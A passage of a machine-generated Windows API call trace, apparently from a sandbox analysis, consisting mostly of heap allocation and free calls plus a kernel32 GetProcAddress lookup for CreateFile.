hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0075.762] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0075.762] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.762] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0075.764] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.764] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.764] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0075.764] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.764] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.764] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0075.764] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.764] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690900 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0075.764] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.764] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e4c8 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.764] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0075.765] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.765] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.765] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.765] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.765] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.765] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.766] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0075.766] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.766] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.766] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.766] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.766] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.766] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.766] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.766] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0075.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6969c0 [0075.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0075.768] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0075.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0075.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0075.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.771] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb) returned 0x76e1f8 [0075.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76e1f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0075.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.772] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0075.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e1f8 [0075.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x76e1f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0075.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, 